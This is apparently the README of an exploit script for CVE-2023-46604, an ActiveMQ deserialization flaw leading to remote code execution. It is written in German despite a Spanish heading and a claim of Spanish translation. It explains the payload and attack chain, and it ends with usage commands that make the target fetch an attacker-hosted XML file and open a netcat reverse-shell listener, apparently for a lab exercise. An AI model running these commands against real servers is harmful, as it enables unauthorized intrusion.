
Das Skript nutzt eine Sicherheitslücke durch unsichere Deserialisierung in Apache ActiveMQ aus (CVE-2023-46604).
Resumen Técnico del Ataque: CVE-2023-46604
Das Skript nutzt eine Sicherheitslücke bei unsicherer Deserialisierung in Apache ActiveMQ (CVE-2023-46604) aus, um eine Remotecodeausführung auf dem Zielserver zu erreichen. Beschreibung des Ausnutzungsprozesses
Ziel der Schwachstelle:
Die Schwachstelle liegt im OpenWire-Protokoll von Apache ActiveMQ.
Sie ermöglicht die unsichere Deserialisierung von Objekten, was dazu genutzt werden kann, beliebigen Code auf dem Server auszuführen.
Voraussetzungen:
Netzwerkzugriff auf den ActiveMQ-Server.
Eine schädliche XML-Datei (poc.xml), die über eine vom Zielserver erreichbare URL verfügbar ist.
Komponenten des Angriffs:
Python-Skript: Automatisiert das Senden der schädlichen Nutzlast an den ActiveMQ-Server.
XML-Datei (poc.xml): Enthält einen Spring-Bean, der die Ausführung eines schädlichen Befehls definiert (z. B. Öffnen einer Reverse Shell).
Schritte des Angriffs
Vorbereitung der Nutzlast:
Das Skript erstellt eine hexadezimale Nachricht, die Folgendes enthält:
Den Namen der Java-Klasse: org.springframework.context.support.ClassPathXmlApplicationContext.
Die URL der schädlichen XML-Datei.
Die Nutzlast wird in eine Byte-Sequenz umgewandelt, die über das OpenWire-Protokoll gesendet werden kann.
Senden der Nutzlast:
Das Skript öffnet eine TCP-Socketverbindung zum ActiveMQ-Server auf dem angegebenen Port (standardmäßig 61616).
Es sendet die schädliche Nutzlast an den Server.
Ausführung des schädlichen Codes:
Der ActiveMQ-Server deserialisiert das in der Nutzlast angegebene Objekt.
Aufgrund der unsicheren Deserialisierung wird der in der XML-Datei definierte Spring-Bean geladen und ausgeführt.
Dieser Bean führt einen schädlichen Befehl (z. B. eine Reverse Shell) auf dem Server aus.
_________________________________________________________
Ausführungsbeispiel:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
Dieses Skript wurde kopiert und ins Spanische übersetzt/modifiziert: https://github.com/evkl1d/CVE-2023-46604.git